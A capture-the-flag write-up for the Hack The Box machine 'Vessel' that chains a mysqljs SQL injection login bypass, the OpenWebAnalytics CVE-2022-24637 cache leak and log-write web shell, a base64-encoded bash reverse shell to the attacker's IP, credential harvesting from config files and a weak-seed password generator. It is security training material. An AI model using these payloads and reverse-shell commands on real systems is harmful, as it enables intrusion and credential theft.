# Vessel - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img width="560" height="424" src="images/0.png"></div>

Vessel is a cool hard-rated HTB machine created by [0xM4hm0ud](https://twitter.com/0xM4hm0ud)

This machine has multiple steps, each as formidable as the previous one.  
It starts with `git-dumper` to dump source code to find `mysqljs`, which is vulnerable to a novel SQL injection.  
Using the SQLi for authentication bypass, we learn of a subdomain running an outdated OpenWebAnalytics instance.  
The OpenWebAnalytics has a couple CVEs which lead to RCE, but there is no public PoC, and the blog post describing the attack is intentionally vague.  
We can exploit those CVEs and get shell as `www-data` by source code analysis and referring to the blog post.

We then reverse a PyInstaller executable and discover a PRNG with bad seed in there. By abusing that, we can brute force the password to a PDF containing SSH credentials.  
For root, we exploit `pinns`, a SUID binary which is part of the `CRI-O` container engine.

## Initial recon

```console
opcode@parrot$ nmap -v -p- 10.10.11.178
Nmap scan report for 10.10.11.178
Host is up (0.095s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
```

```console
opcode@parrot$ nmap -sC -sV -p 22,80 -oN vessel.nmap 10.10.11.178
Nmap scan report for 10.10.11.178
Host is up (0.087s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 38:c2:97:32:7b:9e:c5:65:b4:4b:4e:a3:30:a5:9a:a5 (RSA)
|   256 33:b3:55:f4:a1:7f:f8:4e:48:da:c5:29:63:13:83:3d (ECDSA)
|_  256 a1:f1:88:1c:3a:39:72:74:e6:30:1f:28:b6:80:25:4e (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Vessel
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

We have the usual SSH (22) and HTTP (80) ports here.

Visiting the website on port 80:

![1](images/1.png)

The footer says "Copyright © 2022 - Vessel.htb"  
Hence, I added this line to `/etc/hosts`:

```text
10.10.11.178 vessel.htb
```

Running a `gobuster` vhost scan yielded no results.

If we inspect the responses in Burp, this header is present:

```text
X-Powered-By: Express
```

It implies that the website is a Node.js application using the Express framework.

When I tried to run `gobuster` in `dir` mode, it complained about all pages getting redirected to return the same status code of 200.  
I decided to use `ffuf` because it allows us to filter with size:

```console
opcode@parrot$ ffuf -c -w ~/cybersec/wordlists/raft-small-words.txt -u 'http://vessel.htb/FUZZ' -mc all -fs 26 2>/dev/null
logout                  [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 87ms]
img                     [Status: 301, Size: 173, Words: 7, Lines: 11, Duration: 94ms]
404                     [Status: 200, Size: 2393, Words: 999, Lines: 52, Duration: 88ms]
Admin                   [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 89ms]
Login                   [Status: 200, Size: 4213, Words: 1929, Lines: 71, Duration: 93ms]
dev                     [Status: 301, Size: 173, Words: 7, Lines: 11, Duration: 90ms]
.                       [Status: 200, Size: 15030, Words: 5599, Lines: 244, Duration: 91ms]
js                      [Status: 301, Size: 171, Words: 7, Lines: 11, Duration: 3812ms]
login                   [Status: 200, Size: 4213, Words: 1929, Lines: 71, Duration: 3816ms]
500                     [Status: 200, Size: 2335, Words: 991, Lines: 52, Duration: 90ms]
Register                [Status: 200, Size: 5830, Words: 3040, Lines: 90, Duration: 94ms]
admin                   [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 4833ms]
register                [Status: 200, Size: 5830, Words: 3040, Lines: 90, Duration: 4832ms]
css                     [Status: 301, Size: 173, Words: 7, Lines: 11, Duration: 4834ms]
401                     [Status: 200, Size: 2400, Words: 1029, Lines: 53, Duration: 87ms]
ADMIN                   [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 91ms]
Logout                  [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 86ms]
reset                   [Status: 200, Size: 3637, Words: 1604, Lines: 64, Duration: 90ms]
server-status           [Status: 403, Size: 275, Words: 20, Lines: 10, Duration: 86ms]
LogOut                  [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 90ms]
LogIn                   [Status: 200, Size: 4213, Words: 1929, Lines: 71, Duration: 90ms]
LOGIN                   [Status: 200, Size: 4213, Words: 1929, Lines: 71, Duration: 89ms]
Reset                   [Status: 200, Size: 3637, Words: 1604, Lines: 64, Duration: 88ms]
```

The `/dev` route is always interesting.  
Praying for an LFI, I decided to fuzz it for parameters:

```console
opcode@parrot$ ffuf -c -w ~/cybersec/wordlists/burp-parameter-names.txt -u 'http://vessel.htb/dev?FUZZ=../../../etc/passwd' -mc all -r -fs 2393 2>/dev/null
```

And it found nothing.  
Next, I tried to fuzz for more routes within `/dev`:

```console
opcode@parrot$ ffuf -c -w ~/cybersec/wordlists/raft-small-words.txt -u 'http://vessel.htb/dev/FUZZ' -mc all -fs 26 2>/dev/null
```

It did not find anything either.

## `git-dumper`

Whenever I see `/dev` or `/app`, I try visiting `.git/HEAD` out of habit.  
And that weirdly worked on this box.  
This application is built with `express`, and routes must be predefined in that framework.  
I expected to see this vulnerability with `.git` exposed in a vanilla PHP application and certainly not in a `node.js` application.

Leaving that aside, we can use `git-dumper` (<https://github.com/arthaud/git-dumper>) to dump the repository:

```console
opcode@parrot$ git-dumper http://vessel.htb/dev/.git vessel-dump
```

After getting the source, I checked the routes but found nothing that could explain this unreasonable `.git` behavior.  
I was able to answer this query after I finally got a shell on the box.

<details>
<summary>Click to expand</summary>

In the git dump, inside the `public` directory, we have:

```console
opcode@parrot:~/vessel-dump/public$ ls
css  img  js
```

But on the box, we have:

```console
www-data@vessel:/var/www/html/vessel/vessel/public$ ls
css  dev  img  js
```

And inside this dev directory:

```console
www-data@vessel:/var/www/html/vessel/vessel/public/dev$ ls -la
total 12
drwx------ 3 www-data www-data 4096 Aug 11 14:43 .
drwx------ 6 www-data www-data 4096 Aug 11 14:43 ..
drwxr-xr-x 8 root     root     4096 Aug 11 14:43 .git
```

And in `index.js`, they have this line:

```js
app.use(express.static(path.join(__dirname + '/public')));
```

This explains how `.git` was accessible in a `node.js` application.  
An unnatural setup, of course, but I dig it.

</details>

Moving to enumeration, let us take a lot at the commit history:

```console
opcode@parrot$ git log
commit 208167e785aae5b052a4a2f9843d74e733fbd917 (HEAD -> master)
Author: Ethan <ethan@vessel.htb>
Date:   Mon Aug 22 10:11:34 2022 -0400

    Potential security fixes

commit edb18f3e0cd9ee39769ff3951eeb799dd1d8517e
Author: Ethan <ethan@vessel.htb>
Date:   Fri Aug 12 14:19:19 2022 -0400

    Security Fixes

commit f1369cfecb4a3125ec4060f1a725ce4aa6cbecd3
Author: Ethan <ethan@vessel.htb>
Date:   Wed Aug 10 15:16:56 2022 -0400

    Initial commit
```

We can `diff` against the previous commit:

```console
opcode@parrot$ git show edb18f3e0cd9ee39769ff3951eeb799dd1d8517e
```

It gives us:

```diff
diff --git a/routes/index.js b/routes/index.js
index 0cf479c..69c22be 100644
--- a/routes/index.js
+++ b/routes/index.js
@@ -1,6 +1,6 @@
 var express = require('express');
 var router = express.Router();
-var mysql = require('mysql');
+var mysql = require('mysql'); /* Upgraded deprecated mysqljs */
 var flash = require('connect-flash');
 var db = require('../config/db.js');
 var connection = mysql.createConnection(db.db)
```

We also have credentials in `config/db.js`:

```js
var mysql = require('mysql');

var connection = {
        db: {
        host     : 'localhost',
        user     : 'default',
        password : 'daqvACHKvRn84VdVp',
        database : 'vessel'
}};

module.exports = connection;
```

## SQL injection in `mysqljs`

Googling for "mysqljs vulnerability" brings us to <https://flattsecurity.medium.com/finding-an-unseen-sql-injection-by-bypassing-escape-functions-in-mysqljs-mysql-90b27f6542b4>  
Typically, query escape functions or placeholders are features that prevent SQL injections. However, `mysqljs` supports different escape methods over different value types, and conflicting them can cause SQL injections.

The article I mentioned has a detailed explanation of the topic, along with examples.  
I attempted to exploit this vulnerability on the page <http://vessel.htb/login>

I intercepted the request and changed `Content-Type` from `application/x-www-form-urlencoded` to `application/json`  
I also changed the body to:

```json
{"username":"admin","password":{"password":1}}
```

The final post request was:

```http
POST /api/login HTTP/1.1
Host: vessel.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 31
Origin: http://vessel.htb
DNT: 1
Connection: close
Referer: http://vessel.htb/login
Cookie: connect.sid=s%3A2B9twviVDjXthSw-3Y7ljBBiDOIqb_et.qt9ZVIIL5gWx5LNLoNJ0gsJB3lhQUiJkM1jglH5%2BDkA
Upgrade-Insecure-Requests: 1

{"username":"admin","password":{"password":1}}
```

It worked and allowed me to access the dashboard.  
The dashboard leaks a list of employees, and interestingly the "Analytics" button takes us to <http://openwebanalytics.vessel.htb/>  

![2](images/2.png)

I updated `/etc/hosts` to:

```text
10.10.11.178 vessel.htb openwebanalytics.vessel.htb
```

## Cache disclosure via quote confusion on OpenWebAnalytics (CVE-2022-24637)

Viewing the page source, it appears to be running Open Web Analytics (OWA) version 1.7.3  
In version 1.7.4, CVE-2022-24637 was patched, which leaked sensitive cache information resulting in admin account takeover.  
The root issue is that escape sequences do not get evaluated when single quotes are used.

You can read about the vulnerability here: <https://devel0pment.de/?p=2494>  
It also discusses another attack that can be executed after getting access to the admin account to gain RCE.  

Since the exploit (at least the latter part) is not straightforward, I decided to get a local vulnerable instance of OpenWebAnalytics running.  
So I created the `docker-compose.yml`:

```yaml
services:
  owa:
    build: .
    ports:
      - 80:80
  db:
    image: mysql:5.7
    ports:
      - 3306:3306
    environment:
      - MYSQL_ROOT_PASSWORD=rootpass
      - MYSQL_USER=opcode
      - MYSQL_DATABASE=owadb
      - MYSQL_PASSWORD=opcode
```

And the `Dockerfile`:

```docker
FROM php:7.4.3-apache-buster

RUN docker-php-ext-install mysqli

RUN set -ex; \
    apt-get update; \
    apt-get install -y --no-install-recommends \
    wget \
    tar; \
    apt-get autoremove -y --purge; \
    apt-get clean; \
    rm -rf /var/lib/apt/lists/*

COPY owa-config.php /var/www/html/

RUN set -ex; \
    cd /var/www/html; \
    wget https://github.com/Open-Web-Analytics/Open-Web-Analytics/releases/download/1.7.3/owa_1.7.3_packaged.tar; \
    tar -xvf owa_1.7.3_packaged.tar; \
    rm owa_1.7.3_packaged.tar; \
    chown -R www-data:www-data /var/www/html

RUN mv "$PHP_INI_DIR/php.ini-development" "$PHP_INI_DIR/php.ini"

EXPOSE 80

CMD ["apache2-foreground"]
```

The file `owa-config.php` contains:

```php
<?php

define('OWA_DB_TYPE', 'mysql');
define('OWA_DB_NAME', 'owadb');
define('OWA_DB_HOST', 'db');
define('OWA_DB_USER', 'opcode');
define('OWA_DB_PORT', '3306');
define('OWA_DB_PASSWORD', 'opcode');

define('OWA_NONCE_KEY', ']-*#bz4nV2u-4)HW${3)qhpqm`uv&SCLwI!HM8y~SG^Hf!ENMt_(:?.Ec#oLiM<Z');  
define('OWA_NONCE_SALT', 'V~HV{K-sxqr`nq!4L#):*@#p<Vc8:IecsC(Qzq)3!F/qRvLf!Bh_7cwbr!zoLKXA');
define('OWA_AUTH_KEY', 'rB]B (a_<y1h#Xu@hg>uv$D29CIensZVq>vJtD}Bs`O;UIqdZ!PkpT <d*E Ne#?');
define('OWA_AUTH_SALT', 'p~5,ORTjUt_%FJ[THVE_x-QB^Jg${(Q+RF0H%@Kq5]jQ,;#$-tdaek#^wGw!MP3P');

define('OWA_PUBLIC_URL', 'http://localhost/');

// define('OWA_ERROR_HANDLER', 'production');
?>
```

Originally, I did not have that `COPY owa-config.php /var/www/html/` line, but at some point, I figured out that it was responsible for DB credentials.  
We can start the vulnerable instance locally with:

```console
opcode@parrot$ docker compose up
```

Visiting <http://127.0.0.1> in the browser takes us to `/install.php`, where we need to fill up some info.  
I set site domain to `http://127.0.0.1`, email to `opcode@[172.17.0.1]` and username as well as password to `admin`.

![3](images/3.png)

After finishing the setup, it took me back to the login page, and I logged in using `admin:admin`

Now, we need to find out the location of the cache file. For that, I wanted to get a shell on the container.  
List running containers with:

```console
opcode@parrot$ docker ps -a     
CONTAINER ID   IMAGE          COMMAND                  CREATED         STATUS         PORTS                                                  NAMES
be2640182de8   owa_vuln-owa   "docker-php-entrypoi…"   9 minutes ago   Up 9 minutes   0.0.0.0:80->80/tcp, :::80->80/tcp                      owa_vuln-owa-1
69b11e4f2e3b   mysql:5.7      "docker-entrypoint.s…"   9 minutes ago   Up 9 minutes   0.0.0.0:3306->3306/tcp, :::3306->3306/tcp, 33060/tcp   owa_vuln-db-1
```

We can get the container ID from here and get a shell on the container:

```console
opcode@parrot$ docker exec -it be2640182de8 bash
```

Inside the cache directory, I found:

```console
root@be2640182de8:/var/www/html/owa-data/caches/1/owa_user# ls
c30da9265ba0a4704db9229f864c9eb7.php  index.php
```

I learnt that the username determines the name of this cache file, and using the forgot password feature, I found that `admin@vessel.htb` is a valid email.  
Hence, the same cache file path should work.

With `curl 'http://localhost/owa-data/caches/1/owa_user/c30da9265ba0a4704db9229f864c9eb7.php'` I was able to get a base64 encoded blob, which, when decoded, seemed like serialized data.  
We can use <https://www.unserialize.com/> to get a clear look at the data.  
The key takeaway is that all properties of the user within the MySQL database get leaked, including the username, hashed password, `temp_passkey` and API key  
`temp_passkey` can allow us to reset password quickly.  
Originally, `temp_passkey` was not in there, but once you use the web interface to reset the password, it also gets cached.

Next, I wanted to figure out the URL to reset the password and had to dive a bit into the source.  
I visited <https://github.com/Open-Web-Analytics/Open-Web-Analytics> and searched for `temp_passkey`  
I found <https://github.com/Open-Web-Analytics/Open-Web-Analytics/blob/master/modules/base/templates/users_reset_password_email.tpl>:

```php
<P>Someone, hopefully you, has requested a reset of your Open Web Analytics account password.</P>

<p>If this message was generated in error, please disregard. If not, please click on the link below
to complete the process.</p>

<?php echo $this->makeAbsoluteLink(array('do' => 'base.usersPasswordEntry', 'k' => $key));
```

Also, in <https://github.com/Open-Web-Analytics/Open-Web-Analytics/blob/master/owa_template.php>, I found the `makeAbsoluteLink` function.  
The relevant part is:

```php
$count = count($all_params);
$i = 0;
foreach ($all_params as $n => $v) {
    $get .= $this->config['ns'].owa_sanitize::escapeForDisplay($n).'='.owa_sanitize::escapeForDisplay($v);
    $i++;

    if ($i < $count):
        $get .= "&";
    endif;
}
```

The `config` is defined in <https://github.com/Open-Web-Analytics/Open-Web-Analytics/blob/master/modules/base/classes/settings.php>  
There, I learnt:

```php
return array(
    'base' => array(
      'ns'                                => 'owa_',
    // --SNIP-- //
```

Hence, I was able to deduce the reset URL to be:

```text
http://localhost/index.php?owa_do=base.usersPasswordEntry&owa_k=e9c0ac605ddacbbd848c4b7f5bec84e6
```

We should try it on remote now.  
On a fresh instance, <http://openwebanalytics.vessel.htb/owa-data/caches/1/owa_user/c30da9265ba0a4704db9229f864c9eb7.php> returns 404.  
But the file was created after I attempted to log in as `admin@vessel.htb`.  
Even after creation, it did not contain `temp_passkey`. I had to send a reset password email first.

I retrieved the `temp_passkey`: `53ef263b1f7727fdd7ffd9428eb51e0f` and attempted a reset by visiting <http://openwebanalytics.vessel.htb/index.php?owa_do=base.usersPasswordEntry&owa_k=53ef263b1f7727fdd7ffd9428eb51e0f>

It worked fine, and I could get into the OWA dashboard with the new password.

## RCE via log write on OpenWebAnalytics (CVE-2022-24637)

I attempted it first on my local instance. The initial step is a mass assignment vulnerability, where we can modify settings which are not visible in the GUI.  
I clicked the "Update Configuration" button on the settings page and intercepted the request in burp.  
I URL decoded the body and added couple more parameters:

```text
owa_config[base.error_log_file]=/var/www/html/owa-data/opcode.php&owa_config[base.error_log_level]=2
```

With this, a file `opcode.php` would be created to log all post requests.  
After that, I made a post request to `/index.php` with the body:

```text
data='<?php system($_GET[cmd]) ?>'
```

After it gets logged, I was able to get RCE with commands like `curl 'http://localhost/owa-data/opcode.php?cmd=id'`

When I tried the same steps on remote, they did not work.  
I noticed that the Event Log file directory on the box is set to `/var/www/html/owa/owa-data/logs/` whereas on my container, it was `/var/www/html/owa-data/logs/`  
That makes sense because OWA is a subdomain on the box.

Hence, I had to change the configs a bit:

```text
owa_config[base.error_log_file]=/var/www/html/owa/owa-data/opcode.php&owa_config[base.error_log_level]=2
```

We can test RCE now:

```console
opcode@parrot$ curl 'http://openwebanalytics.vessel.htb/owa-data/opcode.php?cmd=id'
```

Among the wall of text, I was able to find:

```text
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

Next, I attempted to get a reverse shell:

```console
opcode@parrot$ curl 'http://openwebanalytics.vessel.htb/owa-data/opcode.php?cmd=echo+YmFzaCAtYyAnYmFzaCAtaSAgPiYgL2Rldi90Y3AvMTAuMTAuMTQuNjEvOTAwMSAgMD4mMScK|base64+-d|bash'
```

And I got shell as `www-data`  
First, upgrade it with:

```console
www-data@vessel:/var/www$ python3 -c 'import pty;pty.spawn("/bin/bash");'
www-data@vessel:/var/www$ ^Z
opcode@parrot$ stty raw -echo; fg
www-data@vessel:/var/www$ export TERM=xterm-256color
www-data@vessel:/var/www$ exec /bin/bash
```

## Harvesting passwords

Next, I uploaded `linpeas.sh`, and it found some things worth checking out.

```text
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwsr-x--- 1 root ethan 796K Mar 15  2022 /usr/bin/pinns (Unknown SUID binary!)
```

I'm guessing this is the primitive to root. Since only `ethan` can read and execute it, it is not immediately useful.

```php
╔══════════╣ Searching passwords in config PHP files
                'db_password'                        => '',
                'mailer-password'                    => '',
                'password_length'                    => 4,
                case "define('OWA_DB_PASSW":
                case "define('OWA_DB_USER'":
                <input type="password"size="30" name="<?php echo $this->getNs();?>db_password" value="<?php echo $config['db_password'];?>">
            <span class="form-label">Database Password:</span>
define('OWA_DB_PASSWORD', 'Vux8*ZF3rek94%NW'); // database user's password
define('OWA_DB_USER', 'owauser'); // database user
```

We have a pair of mySQL credentials in here. Earlier, we had found another pair with `git-dumper`:

```text
owauser:Vux8*ZF3rek94%NW
default:daqvACHKvRn84VdVp
```

The first one was not useful. The second one did find something:

```console
www-data@vessel:/$ mysql -u default -h 127.0.0.1 --password=daqvACHKvRn84VdVp
```

```console
mysql> use vessel;
mysql> show tables;
+------------------+
| Tables_in_vessel |
+------------------+
| accounts         |
+------------------+

mysql> select * from accounts;
+----+----------+----------------------------------+------------------+
| id | username | password                         | email            |
+----+----------+----------------------------------+------------------+
|  1 | admin    | k>N4Hf6TmHE(W]Uq"(RCj}V>&=rB$4}< | admin@vessel.htb |
+----+----------+----------------------------------+------------------+
```

It's not really helpful, either.

```text
╔══════════╣ Files inside others home (limit 20)
/home/steven/passwordGenerator
/home/steven/.bashrc
/home/steven/.notes/screenshot.png
/home/steven/.notes/notes.pdf
/home/steven/.profile
/home/steven/.bash_logout
```

This bit is interesting.  
`pspy` found a bunch of cleanup cron jobs.

## Reversing PyInstaller executable

I downloaded these files to my VM:

```text
/home/steven/passwordGenerator
/home/steven/.notes/screenshot.png
/home/steven/.notes/notes.pdf
```

I expected `passwordGenerator` to be a password generator.  
`notes.pdf` is a password-protected PDF and `screenshot.png` is a screenshot of `passwordGenerator` in use:

![screenshot](images/screenshot.png)

We can assume that the password for `notes.pdf` was generated using `passwordGenerator`

```console
opcode@parrot$ file passwordGenerator
passwordGenerator: PE32 executable (console) Intel 80386, for MS Windows
```

It is a Windows PE32 executable, and running `strings` on it heavily hints towards it being a PyInstaller executable.  
We can use <https://github.com/extremecoders-re/pyinstxtractor> to extract its contents.

```console
opcode@parrot$ python3 pyinstxtractor.py passwordGenerator      
[+] Processing passwordGenerator
[+] Pyinstaller version: 2.1+
[+] Python version: 3.7
[+] Length of package: 34300131 bytes
[+] Found 95 files in CArchive
[+] Beginning extraction...please standby
[+] Possible entry point: pyiboot01_bootstrap.pyc
[+] Possible entry point: pyi_rth_subprocess.pyc
[+] Possible entry point: pyi_rth_pkgutil.pyc
[+] Possible entry point: pyi_rth_inspect.pyc
[+] Possible entry point: pyi_rth_pyside2.pyc
[+] Possible entry point: passwordGenerator.pyc
[!] Warning: This script is running in a different Python version than the one used to build the executable.
[!] Please run this script in Python 3.7 to prevent extraction errors during unmarshalling
[!] Skipping pyz extraction
[+] Successfully extracted pyinstaller archive: passwordGenerator

You can now use a python decompiler on the pyc files within the extracted directory
```

It worked, but it is better to do it with the same python version.  
We can use a docker container for that.

```console
opcode@parrot$ docker run -it --entrypoint=/bin/sh --name python37 python:3.7.2-alpine
```

We can run `pyinstxtractor` in the container now:

```console
opcode@parrot$ docker cp ~/passwordGenerator python37:/home/passwordGenerator
```

```console
/home # wget https://raw.githubusercontent.com/extremecoders-re/pyinstxtractor/master/pyinstxtractor.py
/home # python3 pyinstxtractor.py passwordGenerator 
[+] Processing passwordGenerator
[+] Pyinstaller version: 2.1+
[+] Python version: 3.7
[+] Length of package: 34300131 bytes
[+] Found 95 files in CArchive
[+] Beginning extraction...please standby
[+] Possible entry point: pyiboot01_bootstrap.pyc
[+] Possible entry point: pyi_rth_subprocess.pyc
[+] Possible entry point: pyi_rth_pkgutil.pyc
[+] Possible entry point: pyi_rth_inspect.pyc
[+] Possible entry point: pyi_rth_pyside2.pyc
[+] Possible entry point: passwordGenerator.pyc
[+] Found 142 files in PYZ archive
[+] Successfully extracted pyinstaller archive: passwordGenerator

You can now use a python decompiler on the pyc files within the extracted directory
```

`decompyle3` should work for `python 3.7` executable:

```console
/home # python3 -m pip install decompyle3
/home # cd /home/passwordGenerator_extracted
/home/passwordGenerator_extracted # decompyle3 passwordGenerator.pyc
```

It works, and we get the python code:

```py
from PySide2.QtCore import *
from PySide2.QtGui import *
from PySide2.QtWidgets import *
from PySide2 import QtWidgets
import pyperclip

class Ui_MainWindow(object):

    def setupUi(self, MainWindow):
        if not MainWindow.objectName():
            MainWindow.setObjectName('MainWindow')
        MainWindow.resize(560, 408)
        self.centralwidget = QWidget(MainWindow)
        self.centralwidget.setObjectName('centralwidget')
        self.title = QTextBrowser(self.centralwidget)
        self.title.setObjectName('title')
        self.title.setGeometry(QRect(80, 10, 411, 51))
        self.textBrowser_2 = QTextBrowser(self.centralwidget)
        self.textBrowser_2.setObjectName('textBrowser_2')
        self.textBrowser_2.setGeometry(QRect(10, 80, 161, 41))
        self.generate = QPushButton(self.centralwidget)
        self.generate.setObjectName('generate')
        self.generate.setGeometry(QRect(140, 330, 261, 51))
        self.PasswordLength = QSpinBox(self.centralwidget)
        self.PasswordLength.setObjectName('PasswordLength')
        self.PasswordLength.setGeometry(QRect(30, 130, 101, 21))
        self.PasswordLength.setMinimum(10)
        self.PasswordLength.setMaximum(40)
        self.copyButton = QPushButton(self.centralwidget)
        self.copyButton.setObjectName('copyButton')
        self.copyButton.setGeometry(QRect(460, 260, 71, 61))
        self.textBrowser_4 = QTextBrowser(self.centralwidget)
        self.textBrowser_4.setObjectName('textBrowser_4')
        self.textBrowser_4.setGeometry(QRect(190, 170, 141, 41))
        self.checkBox = QCheckBox(self.centralwidget)
        self.checkBox.setObjectName('checkBox')
        self.checkBox.setGeometry(QRect(250, 220, 16, 17))
        self.checkBox.setCheckable(True)
        self.checkBox.setChecked(False)
        self.checkBox.setTristate(False)
        self.comboBox = QComboBox(self.centralwidget)
        self.comboBox.addItem('')
        self.comboBox.addItem('')
        self.comboBox.addItem('')
        self.comboBox.setObjectName('comboBox')
        self.comboBox.setGeometry(QRect(350, 130, 161, 21))
        self.textBrowser_5 = QTextBrowser(self.centralwidget)
        self.textBrowser_5.setObjectName('textBrowser_5')
        self.textBrowser_5.setGeometry(QRect(360, 80, 131, 41))
        self.password_field = QLineEdit(self.centralwidget)
        self.password_field.setObjectName('password_field')
        self.password_field.setGeometry(QRect(100, 260, 351, 61))
        MainWindow.setCentralWidget(self.centralwidget)
        self.statusbar = QStatusBar(MainWindow)
        self.statusbar.setObjectName('statusbar')
        MainWindow.setStatusBar(self.statusbar)
        self.retranslateUi(MainWindow)
        QMetaObject.connectSlotsByName(MainWindow)

    def retranslateUi(self, MainWindow):
        MainWindow.setWindowTitle(QCoreApplication.translate('MainWindow', 'MainWindow', None))
        self.title.setDocumentTitle('')
        self.title.setHtml(QCoreApplication.translate('MainWindow', '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">\n<html><head><meta name="qrichtext" content="1" /><style type="text/css">\np, li { white-space: pre-wrap; }\n</style></head><body style=" font-family:\'MS Shell Dlg 2\'; font-size:8.25pt; font-weight:400; font-style:normal;">\n<p align="center" style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;"><span style=" font-size:20pt;">Secure Password Generator</span></p></body></html>', None))
        self.textBrowser_2.setDocumentTitle('')
        self.textBrowser_2.setHtml(QCoreApplication.translate('MainWindow', '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">\n<html><head><meta name="qrichtext" content="1" /><style type="text/css">\np, li { white-space: pre-wrap; }\n</style></head><body style=" font-family:\'MS Shell Dlg 2\'; font-size:8.25pt; font-weight:400; font-style:normal;">\n<p align="center" style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;"><span style=" font-size:14pt;">Password Length</span></p></body></html>', None))
        self.generate.setText(QCoreApplication.translate('MainWindow', 'Generate!', None))
        self.copyButton.setText(QCoreApplication.translate('MainWindow', 'Copy', None))
        self.textBrowser_4.setDocumentTitle('')
        self.textBrowser_4.setHtml(QCoreApplication.translate('MainWindow', '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">\n<html><head><meta name="qrichtext" content="1" /><style type="text/css">\np, li { white-space: pre-wrap; }\n</style></head><body style=" font-family:\'MS Shell Dlg 2\'; font-size:8.25pt; font-weight:400; font-style:normal;">\n<p align="center" style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;"><span style=" font-size:14pt;">Hide Password</span></p></body></html>', None))
        self.checkBox.setText('')
        self.comboBox.setItemText(0, QCoreApplication.translate('MainWindow', 'All Characters', None))
        self.comboBox.setItemText(1, QCoreApplication.translate('MainWindow', 'Alphabetic', None))
        self.comboBox.setItemText(2, QCoreApplication.translate('MainWindow', 'Alphanumeric', None))
        self.textBrowser_5.setDocumentTitle('')
        self.textBrowser_5.setHtml(QCoreApplication.translate('MainWindow', '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">\n<html><head><meta name="qrichtext" content="1" /><style type="text/css">\np, li { white-space: pre-wrap; }\n</style></head><body style=" font-family:\'MS Shell Dlg 2\'; font-size:8.25pt; font-weight:400; font-style:normal;">\n<p align="center" style=" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;"><span style=" font-size:16pt;">characters</span></p></body></html>', None))
        self.password_field.setText('')


class MainWindow(QMainWindow, Ui_MainWindow):

    def __init__(self):
        super(MainWindow, self).__init__()
        self.setupUi(self)
        self.setFixedSize(QSize(550, 400))
        self.setWindowTitle('Secure Password Generator')
        self.password_field.setReadOnly(True)
        self.passlen()
        self.chars()
        self.hide()
        self.gen()

    def passlen(self):
        self.PasswordLength.valueChanged.connect(self.lenpass)

    def lenpass(self, l):
        global value
        value = l

    def chars(self):
        self.comboBox.currentIndexChanged.connect(self.charss)

    def charss(self, i):
        global index
        index = i

    def hide(self):
        self.checkBox.stateChanged.connect(self.status)

    def status(self, s):
        global status
        status = s == Qt.Checked

    def copy(self):
        self.copyButton.clicked.connect(self.copied)

    def copied(self):
        pyperclip.copy(self.password_field.text())

    def gen(self):
        self.generate.clicked.connect(self.genButton)

    def genButton(self):
        try:
            hide = status
            if hide:
                self.password_field.setEchoMode(QLineEdit.Password)
            else:
                self.password_field.setEchoMode(QLineEdit.Normal)
            password = self.genPassword()
            self.password_field.setText(password)
        except:
            msg = QMessageBox()
            msg.setWindowTitle('Warning')
            msg.setText('Change the default values before generating passwords!')
            x = msg.exec_()

        self.copy()

    def genPassword(self):
        length = value
        char = index
        if char == 0:
            charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890~!@#$%^&*()_-+={}[]|:;<>,.?'
        else:
            if char == 1:
                charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
            else:
                if char == 2:
                    charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890'
        try:
            qsrand(QTime.currentTime().msec())
            password = ''
            for i in range(length):
                idx = qrand() % len(charset)
                nchar = charset[idx]
                password += str(nchar)

        except:
            msg = QMessageBox()
            msg.setWindowTitle('Error')
            msg.setText('Error while generating password!, Send a message to the Author!')
            x = msg.exec_()

        return password


if __name__ == '__main__':
    app = QtWidgets.QApplication()
    mainwindow = MainWindow()
    mainwindow.show()
    app.exec_()
```

## Bad PRNG seed

`genPassword` is the function of interest. The only source of randomness in there is `qsrand(QTime.currentTime().msec())`  
But it has a fatal issue. If we look at the documentation, <https://doc.qt.io/qt-6/qtime.html#msec> , we would learn that `msec()` can only take values from 0 to 999  
This severely limits the sample space.

Corresponding to every seed, we can generate a password and use all such passwords to brute force the PDF.

